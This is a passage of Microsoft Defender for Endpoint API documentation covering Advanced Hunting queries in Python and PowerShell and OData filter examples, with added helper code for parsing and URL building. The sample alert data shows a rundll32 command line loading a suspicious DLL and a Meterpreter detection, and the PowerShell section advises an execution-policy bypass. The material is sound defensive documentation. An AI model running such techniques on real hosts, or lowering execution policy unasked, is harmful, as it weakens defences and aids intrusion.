req = urllib.request.Request(url, data)
response = urllib.request.urlopen(req)
jsonResponse = json.loads(response.read())
aadToken = jsonResponse["access_token"]

Where:

tenantId: ID of the tenant on behalf of which you want to run the query (that is, the
query is run on the data of this tenant)
appId: ID of your Microsoft Entra app (the app must have 'Run advanced queries'
permission to Microsoft Defender for Endpoint)
appSecret: Secret of your Microsoft Entra app

Run query
Run the following query:

Python

query = 'DeviceRegistryEvents | limit 10' # Paste your own query here

url = "https://api.securitycenter.microsoft.com/api/advancedqueries/run"
headers = {
    'Content-Type' : 'application/json',
    'Accept' : 'application/json',
    'Authorization' : "Bearer " + aadToken
}

data = json.dumps({ 'Query' : query }).encode("utf-8")

req = urllib.request.Request(url, data, headers)
response = urllib.request.urlopen(req)
jsonResponse = json.loads(response.read())
schema = jsonResponse["Schema"]
results = jsonResponse["Results"]

schema contains the schema of the results of your query
results contains the results of your query

Complex queries

If you want to run complex queries (or multiline queries), save your query in a file and,
instead of the first line in the above sample, run the following command:

Python

queryFile = open("D:\\Temp\\myQuery.txt", 'r') # Replace with the path to your file
query = queryFile.read()
queryFile.close()

Work with query results

You can now use the query results.

To iterate over the results, use the following command:

Python

for result in results:
    print(result) # Prints the whole result
    print(result["EventTime"]) # Prints only the property 'EventTime' from the result

To output the results of the query in CSV format in file file1.csv, use the following
command:

Python

import csv

# newline='' stops the csv module from writing blank lines on Windows;
# the header row is taken from the first result, so guard against an empty result set
with open("D:\\Temp\\file1.csv", 'w', newline='') as outputFile:
    output = csv.writer(outputFile)
    if results:
        output.writerow(results[0].keys())
        for result in results:
            output.writerow(result.values())
To output the results of the query in JSON format in file file1.json, use the following
command:

Python

with open("D:\\Temp\\file1.json", 'w') as outputFile:
    json.dump(results, outputFile)
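The run endpoint returns a Schema (column Name and Kusto Type) next to the Results rows; the export snippets above only use Results and take the header from the first row. As an added example, not Microsoft's sample code, the following Python builds the request the way the samples do and then drives typing and CSV export from the Schema, so an empty result still yields a header and a column missing from a row cannot shift the others. The sample response, the helper names and the registry key value are constructed for the example.

```python
"""Schema-aware handling of an Advanced Hunting response (added example, not Microsoft's
sample code). The run endpoint returns a Schema (column Name and Kusto Type) and Results
(one dict per row); the helpers below use the Schema for column order and typing, and
build the request exactly as the samples above do, with the KQL inside the JSON body."""
import csv
import io
import json
import re
from datetime import datetime, timezone
from typing import Any, Dict, List, Tuple

RUN_URL = "https://api.securitycenter.microsoft.com/api/advancedqueries/run"
_ISO = re.compile(r"^(\d{4}-\d{2}-\d{2}T\d{2}:\d{2}:\d{2})(?:\.(\d+))?Z$")


def build_run_request(query: str, token: str) -> Tuple[str, Dict[str, str], bytes]:
    """(url, headers, body) for POST /api/advancedqueries/run. The query travels in the
    JSON body, so quotes, pipes or newlines in the KQL never touch the URL or headers."""
    headers = {"Content-Type": "application/json", "Accept": "application/json",
               "Authorization": "Bearer " + token}
    return RUN_URL, headers, json.dumps({"Query": query}).encode("utf-8")


def parse_kusto_datetime(value: str) -> datetime:
    """Kusto emits up to seven fractional digits; datetime accepts six, so truncate."""
    m = _ISO.match(value)
    if not m:
        raise ValueError("unexpected datetime format: %r" % value)
    micros = (m.group(2) or "0")[:6].ljust(6, "0")
    return datetime.strptime(m.group(1) + "." + micros,
                             "%Y-%m-%dT%H:%M:%S.%f").replace(tzinfo=timezone.utc)


def convert(value: Any, kusto_type: str) -> Any:
    """Coerce one cell according to its Schema type; unknown types pass through unchanged."""
    if value is None:
        return None
    if kusto_type == "DateTime":
        return parse_kusto_datetime(value)
    if kusto_type in ("Int64", "Int32", "Int16", "UInt64", "UInt32", "UInt16", "Byte", "SByte"):
        return int(value)
    if kusto_type in ("Double", "Single", "Decimal"):
        return float(value)
    if kusto_type == "Boolean":
        return bool(value)          # the API returns JSON booleans, not strings
    return value


def typed_rows(response: dict) -> List[Dict[str, Any]]:
    """Every Results row with Schema types applied, columns in Schema order; a column
    absent from a row becomes None instead of raising KeyError."""
    schema = [(c["Name"], c["Type"]) for c in response["Schema"]]
    return [{name: convert(row.get(name), ktype) for name, ktype in schema}
            for row in response["Results"]]


def results_to_csv(response: dict) -> str:
    """CSV text whose header comes from Schema, not from the first row: an empty result
    still produces a header, and a missing column becomes an empty cell rather than
    shifting the rest of the row."""
    names = [c["Name"] for c in response["Schema"]]
    buf = io.StringIO()
    writer = csv.DictWriter(buf, fieldnames=names, extrasaction="ignore", restval="",
                            lineterminator="\n")
    writer.writeheader()
    writer.writerows(response["Results"])
    return buf.getvalue()


# Constructed response in the shape the run endpoint returns (DeviceRegistryEvents
# columns); the second row deliberately lacks RegistryKey to show missing-column handling.
SAMPLE_RESPONSE = {
    "Schema": [
        {"Name": "Timestamp", "Type": "DateTime"},
        {"Name": "DeviceName", "Type": "String"},
        {"Name": "ActionType", "Type": "String"},
        {"Name": "RegistryKey", "Type": "String"},
        {"Name": "ReportId", "Type": "Int64"},
    ],
    "Results": [
        {"Timestamp": "2021-01-26T20:31:32.9562661Z",
         "DeviceName": "temp123.middleeast.corp.microsoft.com",
         "ActionType": "RegistryValueSet",
         "RegistryKey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Contoso\\Example",  # constructed
         "ReportId": 1364969609},
        {"Timestamp": "2021-01-26T20:31:33.0577322Z",
         "DeviceName": "temp123.middleeast.corp.microsoft.com",
         "ActionType": "RegistryKeyCreated",
         "ReportId": 1364969610},
    ],
}

if __name__ == "__main__":
    for row in typed_rows(SAMPLE_RESPONSE):
        print(row["Timestamp"].isoformat(), row["ActionType"], row["RegistryKey"])
    print(results_to_csv(SAMPLE_RESPONSE))
```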

Related topics

Microsoft Defender for Endpoint APIs
Advanced Hunting API
Advanced Hunting using PowerShell

Tip

Do you want to learn more? Engage with the Microsoft Security community in our
Tech Community: Microsoft Defender for Endpoint Tech Community.



Advanced Hunting using PowerShell
Article • 02/22/2024

Applies to:

Microsoft Defender for Endpoint Plan 2

Want to experience Microsoft Defender for Endpoint? Sign up for a free trial.

Note

If you are a US Government customer, please use the URIs listed in Microsoft
Defender for Endpoint for US Government customers.

Tip

For better performance, you can use a server closer to your geo location:

api-us.securitycenter.microsoft.com
api-eu.securitycenter.microsoft.com
api-uk.securitycenter.microsoft.com
api-au.securitycenter.microsoft.com

Run advanced queries using PowerShell. For more information, see Advanced Hunting
API.

In this section, we share PowerShell samples to retrieve a token and use it to run a
query.

Before you begin

You first need to create an app.

Preparation instructions

Open a PowerShell window.

If your policy doesn't allow you to run the PowerShell commands, you can run the
following command:

PowerShell

Set-ExecutionPolicy -ExecutionPolicy Bypass

For more information, see PowerShell documentation.

Get token
Run the following:

PowerShell

$tenantId = '00000000-0000-0000-0000-000000000000' # Paste your own tenant ID here
$appId = '11111111-1111-1111-1111-111111111111' # Paste your own app ID here
$appSecret = '22222222-2222-2222-2222-222222222222' # Paste your own app secret here

$resourceAppIdUri = 'https://api.securitycenter.microsoft.com'
$oAuthUri = "https://login.microsoftonline.com/$TenantId/oauth2/token"
$body = [Ordered] @{
    resource = "$resourceAppIdUri"
    client_id = "$appId"
    client_secret = "$appSecret"
    grant_type = 'client_credentials'
}
$response = Invoke-RestMethod -Method Post -Uri $oAuthUri -Body $body -ErrorAction Stop
$aadToken = $response.access_token

Where:

$tenantId: ID of the tenant on behalf of which you want to run the query (that is,
the query is run on the data of this tenant)
$appId: ID of your Microsoft Entra app (the app must have 'Run advanced queries'
permission to Defender for Endpoint)
$appSecret: Secret of your Microsoft Entra app

Run query
Run the following query:

PowerShell

$token = $aadToken
$query = 'DeviceRegistryEvents | limit 10' # Paste your own query here
# Same endpoint as the Python sample: POST /api/advancedqueries/run
$url = "https://api.securitycenter.microsoft.com/api/advancedqueries/run"
$headers = @{
    'Content-Type' = 'application/json'
    Accept = 'application/json'
    Authorization = "Bearer $aadToken"
}
$body = ConvertTo-Json -InputObject @{ 'Query' = $query }
$webResponse = Invoke-WebRequest -Method Post -Uri $url -Headers $headers -Body $body -ErrorAction Stop
$response = $webResponse | ConvertFrom-Json
$results = $response.Results
$schema = $response.Schema

$results contains the results of your query
$schema contains the schema of the results of your query

Complex queries

If you want to run complex queries (or multiline queries), save your query in a file and,
instead of the first line in the above sample, run the following command:

PowerShell

$query = [IO.File]::ReadAllText("C:\myQuery.txt"); # Replace with the path to your file

Work with query results

You can now use the query results.

To output the results of the query in CSV format in file file1.csv, run the following
command:

PowerShell

$results | ConvertTo-Csv -NoTypeInformation | Set-Content C:\file1.csv

To output the results of the query in JSON format in file file1.json, run the following
command:

PowerShell

$results | ConvertTo-Json | Set-Content file1.json


Related articles

Microsoft Defender for Endpoint APIs
Advanced Hunting API
Advanced Hunting using Python

Tip

Do you want to learn more? Engage with the Microsoft Security community in our
Tech Community: Microsoft Defender for Endpoint Tech Community.



OData queries with Microsoft Defender for Endpoint
Article • 11/30/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender for Business

Important

Advanced hunting capabilities are not included in Defender for Business.

Want to experience Microsoft Defender for Endpoint? Sign up for a free trial.

Note

If you are a US Government customer, please use the URIs listed in Microsoft
Defender for Endpoint for US Government customers.

Tip

For better performance, you can use a server closer to your geo location:

api-us.securitycenter.microsoft.com
api-eu.securitycenter.microsoft.com
api-uk.securitycenter.microsoft.com
api-au.securitycenter.microsoft.com

If you aren't familiar with OData queries, see OData V4 queries.

Not all properties are filterable.

Properties that support $filter

Alert: alertCreationTime, lastUpdateTime, incidentId, InvestigationId, status,
severity, and category.

Machine: ComputerDnsName, LastSeen, HealthStatus, OsPlatform, onboardingStatus,
RiskScore, and RbacGroupId.

MachineAction: Status, MachineId, Type, Requestor, and CreationDateTimeUtc.

Indicator: indicatorValue, indicatorType, creationTimeDateTimeUtc, createdBy,
severity, and action.
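Hand-writing $filter strings is where most mistakes happen: a property the API will not filter on, a device name or user containing a quote, or a datetime in the wrong shape. The following Python is an added example, not Microsoft's code: it keeps the filterable-property lists from this page, quotes string literals the OData way (a single quote is doubled) and rebuilds the request URLs used in the examples that follow. The collection names, function names and the rejected sample inputs are my own.

```python
"""Builder for the $filter/$top/$expand requests on this page (added example, not
Microsoft's code). Each filtered property is checked against the lists above, string
literals are quoted the OData way (a single quote is doubled) and datetimes are
emitted in the ISO-8601 UTC form the examples use, so a value taken from an alert,
a device name or a user cannot change the shape of the filter."""
import urllib.parse
from datetime import datetime, timezone
from typing import Optional, Sequence, Tuple, Union

BASE = "https://api.securitycenter.microsoft.com/api"

# Filterable properties per collection, as listed on this page; compared case-insensitively.
FILTERABLE = {
    "alerts": {"alertCreationTime", "lastUpdateTime", "incidentId", "investigationId",
               "status", "severity", "category"},
    "machines": {"computerDnsName", "lastSeen", "healthStatus", "osPlatform",
                 "onboardingStatus", "riskScore", "rbacGroupId"},
    "machineactions": {"status", "machineId", "type", "requestor", "creationDateTimeUtc"},
    "indicators": {"indicatorValue", "indicatorType", "creationTimeDateTimeUtc",
                   "createdBy", "severity", "action"},
}
_FILTERABLE_LC = {coll: {p.lower() for p in props} for coll, props in FILTERABLE.items()}

COMPARISONS = {"eq", "ne", "gt", "ge", "lt", "le"}
FUNCTIONS = {"startswith"}          # the only string function used on this page
SAFE = "'(),=:@$"                   # left unescaped so the URL stays readable, as in the examples

Literal = Union[str, int, bool, datetime]
Clause = Tuple[str, str, Literal]   # (property, operator, value)


def literal(value: Literal) -> str:
    """Render a Python value as an OData literal."""
    if isinstance(value, bool):
        return "true" if value else "false"
    if isinstance(value, int):
        return str(value)
    if isinstance(value, datetime):
        if value.tzinfo is None:
            raise ValueError("datetime literals must be timezone-aware")
        return value.astimezone(timezone.utc).strftime("%Y-%m-%dT%H:%M:%SZ")
    return "'" + value.replace("'", "''") + "'"   # doubling is the OData escape for '


def clause(collection: str, prop: str, op: str, value: Literal) -> str:
    """One filter term; rejects properties the page does not list as filterable."""
    if prop.lower() not in _FILTERABLE_LC.get(collection, set()):
        raise ValueError(f"{collection}.{prop} does not support $filter")
    if op in FUNCTIONS:
        return f"{op}({prop},{literal(value)})"
    if op in COMPARISONS:
        return f"{prop} {op} {literal(value)}"
    raise ValueError(f"unsupported operator {op!r}")


def build_url(collection: str, clauses: Sequence[Clause] = (), top: Optional[int] = None,
              expand: Optional[str] = None) -> str:
    """BASE/collection?$filter=...&$top=...&$expand=..., each option omitted when unset."""
    options = []
    if clauses:
        options.append("$filter=" + " and ".join(clause(collection, p, o, v) for p, o, v in clauses))
    if top is not None:
        options.append(f"$top={int(top)}")
    if expand:
        options.append(f"$expand={expand}")
    query = urllib.parse.quote("&".join(options), safe=SAFE + "&")
    return f"{BASE}/{collection}" + (f"?{query}" if query else "")


def page_examples() -> dict:
    """Examples 1, 2, 3, 6 and 8 from this page, rebuilt through the builder."""
    return {
        1: build_url("alerts", top=10, expand="evidence"),
        2: build_url("alerts", [("lastUpdateTime", "ge", datetime(2019, 11, 22, tzinfo=timezone.utc))]),
        3: build_url("machines", [("riskScore", "eq", "High")]),
        6: build_url("machineactions", [("requestor", "eq", "Analyst@contoso.com"),
                                        ("type", "eq", "RunAntiVirusScan")]),
        8: build_url("machines", [("computerDnsName", "startswith", "mymachine")]),
    }


if __name__ == "__main__":
    for n, url in page_examples().items():
        print(f"Example {n}: {url}")
```

Spaces are percent-encoded rather than written as `+` as in examples 2 to 4; both forms are accepted by the server, the builder just picks one.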

Example 1

Get 10 latest Alerts with related Evidence:

HTTP

HTTP GET https://api.securitycenter.microsoft.com/api/alerts?$top=10&$expand=evidence

Response

JSON

{
    "@odata.context": "https://api.securitycenter.microsoft.com/api/$metadata#Alerts",
    "value": [
        {
            "id": "da637472900382838869_1364969609",
            "incidentId": 1126093,
            "investigationId": null,
            "assignedTo": null,
            "severity": "Low",
            "status": "New",
            "classification": null,
            "determination": null,
            "investigationState": "Queued",
            "detectionSource": "WindowsDefenderAtp",
            "detectorId": "17e10bbc-3a68-474a-8aad-faef14d43952",
            "category": "Execution",
            "threatFamilyName": null,
            "title": "Low-reputation arbitrary code executed by signed executable",
            "description": "Binaries signed by Microsoft can be used to run low-reputation arbitrary code. This technique hides the execution of malicious code within a trusted process. As a result, the trusted process might exhibit suspicious behaviors, such as opening a listening port or connecting to a command-and-control (C&C) server.",
            "alertCreationTime": "2021-01-26T20:33:57.7220239Z",
            "firstEventTime": "2021-01-26T20:31:32.9562661Z",
            "lastEventTime": "2021-01-26T20:31:33.0577322Z",
            "lastUpdateTime": "2021-01-26T20:33:59.2Z",
            "resolvedTime": null,
            "machineId": "111e6dd8c833c8a052ea231ec1b19adaf497b625",
            "computerDnsName": "temp123.middleeast.corp.microsoft.com",
            "rbacGroupName": "A",
            "aadTenantId": "a839b112-1253-6432-9bf6-94542403f21c",
            "threatName": null,
            "mitreTechniques": [
                "T1064",
                "T1085",
                "T1220"
            ],
            "relatedUser": {
                "userName": "temp123",
                "domainName": "DOMAIN"
            },
            "comments": [
                {
                    "comment": "test comment for docs",
                    "createdBy": "secop123@contoso.com",
                    "createdTime": "2021-01-26T01:00:37.8404534Z"
                }
            ],
            "evidence": [
                {
                    "entityType": "User",
                    "evidenceCreationTime": "2021-01-26T20:33:58.42Z",
                    "sha1": null,
                    "sha256": null,
                    "fileName": null,
                    "filePath": null,
                    "processId": null,
                    "processCommandLine": null,
                    "processCreationTime": null,
                    "parentProcessId": null,
                    "parentProcessCreationTime": null,
                    "parentProcessFileName": null,
                    "parentProcessFilePath": null,
                    "ipAddress": null,
                    "url": null,
                    "registryKey": null,
                    "registryHive": null,
                    "registryValueType": null,
                    "registryValue": null,
                    "accountName": "name",
                    "domainName": "DOMAIN",
                    "userSid": "S-1-5-21-11111607-1111760036-109187956-75141",
                    "aadUserId": "11118379-2a59-1111-ac3c-a51eb4a3c627",
                    "userPrincipalName": "temp123@microsoft.com",
                    "detectionStatus": null
                },
                {
                    "entityType": "Process",
                    "evidenceCreationTime": "2021-01-26T20:33:58.6133333Z",
                    "sha1": "ff836cfb1af40252bd2a2ea843032e99a5b262ed",
                    "sha256": "a4752c71d81afd3d5865d24ddb11a6b0c615062fcc448d24050c2172d2cbccd6",
                    "fileName": "rundll32.exe",
                    "filePath": "C:\\Windows\\SysWOW64",
                    "processId": 3276,
                    "processCommandLine": "rundll32.exe c:\\temp\\suspicious.dll,RepeatAfterMe",
                    "processCreationTime": "2021-01-26T20:31:32.9581596Z",
                    "parentProcessId": 8420,
                    "parentProcessCreationTime": "2021-01-26T20:31:32.9004163Z",
                    "parentProcessFileName": "rundll32.exe",
                    "parentProcessFilePath": "C:\\Windows\\System32",
                    "ipAddress": null,
                    "url": null,
                    "registryKey": null,
                    "registryHive": null,
                    "registryValueType": null,
                    "registryValue": null,
                    "accountName": null,
                    "domainName": null,
                    "userSid": null,
                    "aadUserId": null,
                    "userPrincipalName": null,
                    "detectionStatus": "Detected"
                },
                {
                    "entityType": "File",
                    "evidenceCreationTime": "2021-01-26T20:33:58.42Z",
                    "sha1": "8563f95b2f8a284fc99da44500cd51a77c1ff36c",
                    "sha256": "dc0ade0c95d6db98882bc8fa6707e64353cd6f7767ff48d6a81a6c2aef21c608",
                    "fileName": "suspicious.dll",
                    "filePath": "c:\\temp",
                    "processId": null,
                    "processCommandLine": null,
                    "processCreationTime": null,
                    "parentProcessId": null,
                    "parentProcessCreationTime": null,
                    "parentProcessFileName": null,
                    "parentProcessFilePath": null,
                    "ipAddress": null,
                    "url": null,
                    "registryKey": null,
                    "registryHive": null,
                    "registryValueType": null,
                    "registryValue": null,
                    "accountName": null,
                    "domainName": null,
                    "userSid": null,
                    "aadUserId": null,
                    "userPrincipalName": null,
                    "detectionStatus": "Detected"
                }
            ]
        },
        ...
    ]
}

Example 2

Get all the alerts last updated after 2019-11-22 00:00:00:

HTTP

HTTP GET https://api.securitycenter.microsoft.com/api/alerts?$filter=lastUpdateTime+ge+2019-11-22T00:00:00Z

Response

JSON

{
    "@odata.context": "https://api.securitycenter.microsoft.com/api/$metadata#Alerts",
    "value": [
        {
            "id": "da637308392288907382_-880718168",
            "incidentId": 7587,
            "investigationId": 723156,
            "assignedTo": "secop123@contoso.com",
            "severity": "Low",
            "status": "New",
            "classification": "TruePositive",
            "determination": null,
            "investigationState": "Queued",
            "detectionSource": "WindowsDefenderAv",
            "category": "SuspiciousActivity",
            "threatFamilyName": "Meterpreter",
            "title": "Suspicious 'Meterpreter' behavior was detected",
            "description": "Malware and unwanted software are undesirable applications that perform annoying, disruptive, or harmful actions on affected machines. Some of these undesirable applications can replicate and spread from one machine to another. Others are able to receive commands from remote attackers and perform activities associated with cyber attacks.\n\nA malware is considered active if it is found running on the machine or it already has persistence mechanisms in place. Active malware detections are assigned higher severity ratings.\n\nBecause this malware was active, take precautionary measures and check for residual signs of infection.",
            "alertCreationTime": "2020-07-20T10:53:48.7657932Z",
            "firstEventTime": "2020-07-20T10:52:17.6654369Z",
            "lastEventTime": "2020-07-20T10:52:18.1362905Z",
            "lastUpdateTime": "2020-07-20T10:53:50.19Z",
            "resolvedTime": null,
            "machineId": "12ee6dd8c833c8a052ea231ec1b19adaf497b625",
            "computerDnsName": "temp123.middleeast.corp.microsoft.com",
            "rbacGroupName": "MiddleEast",
            "aadTenantId": "a839b112-1253-6432-9bf6-94542403f21c",
            "threatName": null,
            "mitreTechniques": [
                "T1064",
                "T1085",
                "T1220"
            ],
            "relatedUser": {
                "userName": "temp123",
                "domainName": "DOMAIN"
            },
            "comments": [
                {
                    "comment": "test comment for docs",
                    "createdBy": "secop123@contoso.com",
                    "createdTime": "2020-07-21T01:00:37.8404534Z"
                }
            ],
            "evidence": []
        }
        ...
    ]
}

Example 3

Get all the devices with 'High' 'RiskScore':

HTTP

HTTP GET https://api.securitycenter.microsoft.com/api/machines?$filter=riskScore+eq+'High'

Response

JSON

{
    "@odata.context": "https://api.securitycenter.microsoft.com/api/$metadata#Machines",
    "value": [
        {
            "id": "1e5bc9d7e413ddd7902c2932e418702b84d0cc07",
            "computerDnsName": "mymachine1.contoso.com",
            "firstSeen": "2018-08-02T14:55:03.7791856Z",
            "lastSeen": "2021-01-25T07:27:36.052313Z",
            "osPlatform": "Windows10",
            "osProcessor": "x64",
            "version": "1901",
            "lastIpAddress": "10.166.113.46",
            "lastExternalIpAddress": "167.220.203.175",
            "osBuild": 19042,
            "healthStatus": "Active",
            "deviceValue": "Normal",
            "rbacGroupName": "The-A-Team",
            "riskScore": "High",
            "exposureLevel": "Low",
            "aadDeviceId": "fd2e4d29-7072-4195-aaa5-1af139b78028",
            "machineTags": [
                "Tag1",
                "Tag2"
            ],
            "ipAddresses": [
                {
                    "ipAddress": "10.166.113.47",
                    "macAddress": "8CEC4B897E73",
                    "operationalStatus": "Up"
                },
                {
                    "ipAddress": "2a01:110:68:4:59e4:3916:3b3e:4f96",
                    "macAddress": "8CEC4B897E73",
                    "operationalStatus": "Up"
                }
            ]
        },
        ...
    ]
}

Example 4

Get the top 100 devices with 'HealthStatus' not equal to 'Active':

HTTP

HTTP GET https://api.securitycenter.microsoft.com/api/machines?$filter=healthStatus+ne+'Active'&$top=100

Response

JSON

{
    "@odata.context": "https://api.securitycenter.microsoft.com/api/$metadata#Machines",
    "value": [
        {
            "id": "1e5bc9d7e413ddd7902c2932e418702b84d0cc07",
            "computerDnsName": "mymachine1.contoso.com",
            "firstSeen": "2018-08-02T14:55:03.7791856Z",
            "lastSeen": "2021-01-25T07:27:36.052313Z",
            "osPlatform": "Windows10",
            "osProcessor": "x64",
            "version": "1901",
            "lastIpAddress": "10.166.113.46",
            "lastExternalIpAddress": "167.220.203.175",
            "osBuild": 19042,
            "healthStatus": "Active",
            "deviceValue": "Normal",
            "rbacGroupName": "The-A-Team",
            "riskScore": "Low",
            "exposureLevel": "Low",
            "aadDeviceId": "fd2e4d29-7072-4195-aaa5-1af139b78028",
            "machineTags": [
                "Tag1",
                "Tag2"
            ],
            "ipAddresses": [
                {
                    "ipAddress": "10.166.113.47",
                    "macAddress": "8CEC4B897E73",
                    "operationalStatus": "Up"
                },
                {
                    "ipAddress": "2a01:110:68:4:59e4:3916:3b3e:4f96",
                    "macAddress": "8CEC4B897E73",
                    "operationalStatus": "Up"
                }
            ]
        },
        ...
    ]
}

Example 5

Get all the devices last seen after 2018-10-20:

HTTP

HTTP GET https://api.securitycenter.microsoft.com/api/machines?$filter=lastSeen gt 2018-08-01Z

Response

JSON

{
    "@odata.context": "https://api.securitycenter.microsoft.com/api/$metadata#Machines",
    "value": [
        {
            "id": "1e5bc9d7e413ddd7902c2932e418702b84d0cc07",
            "computerDnsName": "mymachine1.contoso.com",
            "firstSeen": "2018-08-02T14:55:03.7791856Z",
            "lastSeen": "2021-01-25T07:27:36.052313Z",
            "osPlatform": "Windows10",
            "osProcessor": "x64",
            "version": "1901",
            "lastIpAddress": "10.166.113.46",
            "lastExternalIpAddress": "167.220.203.175",
            "osBuild": 19042,
            "healthStatus": "Active",
            "deviceValue": "Normal",
            "rbacGroupName": "The-A-Team",
            "riskScore": "Low",
            "exposureLevel": "Low",
            "aadDeviceId": "fd2e4d29-7072-4195-aaa5-1af139b78028",
            "machineTags": [
                "Tag1",
                "Tag2"
            ],
            "ipAddresses": [
                {
                    "ipAddress": "10.166.113.47",
                    "macAddress": "8CEC4B897E73",
                    "operationalStatus": "Up"
                },
                {
                    "ipAddress": "2a01:110:68:4:59e4:3916:3b3e:4f96",
                    "macAddress": "8CEC4B897E73",
                    "operationalStatus": "Up"
                }
            ]
        },
        ...
    ]
}

Example 6
Get all the antivirus scans that the user Analyst@contoso.com requested through Microsoft Defender for Endpoint:

HTTP

GET https://api.securitycenter.microsoft.com/api/machineactions?$filter=requestor eq 'Analyst@contoso.com' and type eq 'RunAntiVirusScan'

Response

JSON

{
"@odata.context":
"https://api.securitycenter.microsoft.com/api/$metadata#MachineActions",
"value": [
{
"id": "2e9da30d-27f6-4208-81f2-9cd3d67893ba",
"type": "RunAntiVirusScan",
"scope": "Full",
"requestor": "Analyst@contoso.com",
"requestorComment": "Check machine for viruses due to alert
3212",
"status": "Succeeded",
"machineId": "f46b9bb259ed4a7fb9981b73510e3cc7aa81ec1f",
"computerDnsName": "desktop-39g9tgl",
"creationDateTimeUtc": "2018-12-04T12:18:27.1293487Z",
"lastUpdateTimeUtc": "2018-12-04T12:18:57.5511934Z",
"relatedFileInfo": null
},
...
]
}

Example 7
Get the count of open alerts for a specific device:

HTTP

GET https://api.securitycenter.microsoft.com/api/machines/123321d0c675eaa415b8e5f383c6388bff446c62/alerts/$count?$filter=status ne 'Resolved'

Response

JSON
4

Example 8
Get all the devices with 'computerDnsName' starting with 'mymachine':

HTTP

GET https://api.securitycenter.microsoft.com/api/machines?$filter=startswith(computerDnsName,'mymachine')

Response

JSON

{
"@odata.context":
"https://api.securitycenter.microsoft.com/api/$metadata#Machines",
"value": [
{
"id": "1e5bc9d7e413ddd7902c2932e418702b84d0cc07",
"computerDnsName": "mymachine1.contoso.com",
"firstSeen": "2018-08-02T14:55:03.7791856Z",
"lastSeen": "2021-01-25T07:27:36.052313Z",
"osPlatform": "Windows10",
"osProcessor": "x64",
"version": "1901",
"lastIpAddress": "10.166.113.46",
"lastExternalIpAddress": "167.220.203.175",
"osBuild": 19042,
"healthStatus": "Active",
"deviceValue": "Normal",
"rbacGroupName": "The-A-Team",
"riskScore": "Low",
"exposureLevel": "Low",
"aadDeviceId": "fd2e4d29-7072-4195-aaa5-1af139b78028",
"machineTags": [
"Tag1",
"Tag2"
],
"ipAddresses": [
{
"ipAddress": "10.166.113.47",
"macAddress": "8CEC4B897E73",
"operationalStatus": "Up"
},
{
"ipAddress": "2a01:110:68:4:59e4:3916:3b3e:4f96",
"macAddress": "8CEC4B897E73",
"operationalStatus": "Up"
}
]
},
...
]
}
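
The OData patterns in Examples 4 through 8 (comparison filters, startswith, $top, $count and the unquoted date literal) are easy to get wrong in a script: an unescaped single quote in a value breaks the filter, and a device ID spliced into the path can change the route. The following Python helper is an added example, not code from the Defender for Endpoint documentation. It builds those URLs with proper escaping, validates the device ID before it enters the path, and walks a paginated collection by following @odata.nextLink. The fetch_json callable, SAMPLE_PAGES and the $skiptoken continuation URL are assumptions standing in for an authenticated client and real responses.

```python
"""Build Defender for Endpoint machines-API queries and walk paginated results.

Added example, not code from the Defender for Endpoint documentation. The URL
shapes follow Examples 4 to 8; fetch_json is an assumed caller-supplied
callable that performs the authenticated GET and returns the parsed JSON body.
"""
import re
from datetime import datetime
from urllib.parse import urlencode

API_BASE = "https://api.securitycenter.microsoft.com/api/"
COMPARISONS = {"eq", "ne", "gt", "ge", "lt", "le"}
FUNCTIONS = {"startswith", "endswith", "contains"}
FIELD_RE = re.compile(r"[A-Za-z][A-Za-z0-9]*")
MACHINE_ID_RE = re.compile(r"[0-9a-f]{40}")  # device IDs are 40 hex chars, as in the samples


def odata_literal(value):
    """Render a value as an OData literal: strings quoted with embedded single
    quotes doubled (the OData escape), datetimes unquoted in UTC like the
    page's `lastSeen gt 2018-08-01Z`, numbers and booleans bare."""
    if isinstance(value, bool):
        return "true" if value else "false"
    if isinstance(value, (int, float)):
        return str(value)
    if isinstance(value, datetime):
        return value.strftime("%Y-%m-%dT%H:%M:%SZ")
    return "'" + str(value).replace("'", "''") + "'"


def build_filter(conditions):
    """conditions: iterable of (field, operator, value) tuples, joined with 'and'."""
    clauses = []
    for field, op, value in conditions:
        if not FIELD_RE.fullmatch(field):
            raise ValueError(f"bad field name: {field!r}")
        if op in COMPARISONS:
            clauses.append(f"{field} {op} {odata_literal(value)}")
        elif op in FUNCTIONS:
            clauses.append(f"{op}({field},{odata_literal(value)})")
        else:
            raise ValueError(f"unsupported operator: {op!r}")
    return " and ".join(clauses)


def machines_url(conditions=None, top=None):
    """URL for GET /machines with optional $filter and $top."""
    params = []
    if conditions:
        params.append(("$filter", build_filter(conditions)))
    if top is not None:
        params.append(("$top", str(int(top))))
    query = urlencode(params, safe="$")  # '$' stays readable; spaces and quotes are encoded
    return API_BASE + "machines" + ("?" + query if query else "")


def open_alert_count_url(machine_id):
    """URL for Example 7. The ID is validated before it enters the path so an
    attacker-controlled value such as '../foo' cannot change the route."""
    if not MACHINE_ID_RE.fullmatch(machine_id):
        raise ValueError("machine id must be 40 lowercase hex characters")
    query = urlencode([("$filter", "status ne 'Resolved'")], safe="$")
    return f"{API_BASE}machines/{machine_id}/alerts/$count?{query}"


def iter_items(fetch_json, url):
    """Yield every item in a collection, following @odata.nextLink pages."""
    visited = set()
    while url:
        if url in visited:  # defensive: never loop forever on a bad nextLink
            raise RuntimeError("pagination loop at " + url)
        visited.add(url)
        page = fetch_json(url)
        yield from page.get("value", [])
        url = page.get("@odata.nextLink")


def unhealthy_devices(fetch_json, top=100):
    """Example 4 end to end: (name, healthStatus) for devices that are not 'Active'."""
    url = machines_url([("healthStatus", "ne", "Active")], top=top)
    return [(m["computerDnsName"], m["healthStatus"]) for m in iter_items(fetch_json, url)]


EXAMPLE5_URL = machines_url([("lastSeen", "gt", datetime(2018, 8, 1))])

# Constructed pages standing in for the API (not real responses); the
# $skiptoken continuation URL is an assumption about how paging is expressed.
_PAGE2 = API_BASE + "machines?$skiptoken=constructed"
SAMPLE_PAGES = {
    machines_url([("healthStatus", "ne", "Active")], top=100): {
        "@odata.context": API_BASE + "$metadata#Machines",
        "value": [{"computerDnsName": "mymachine1.contoso.com", "healthStatus": "Inactive"}],
        "@odata.nextLink": _PAGE2,
    },
    _PAGE2: {"value": [{"computerDnsName": "mymachine2.contoso.com", "healthStatus": "NoSensorData"}]},
}


def sample_fetch(url):
    """Stand-in for an authenticated GET: looks the URL up in SAMPLE_PAGES."""
    return SAMPLE_PAGES[url]


if __name__ == "__main__":
    print(machines_url([("computerDnsName", "startswith", "mymachine")]))
    print(EXAMPLE5_URL)
    print(unhealthy_devices(sample_fetch))
```

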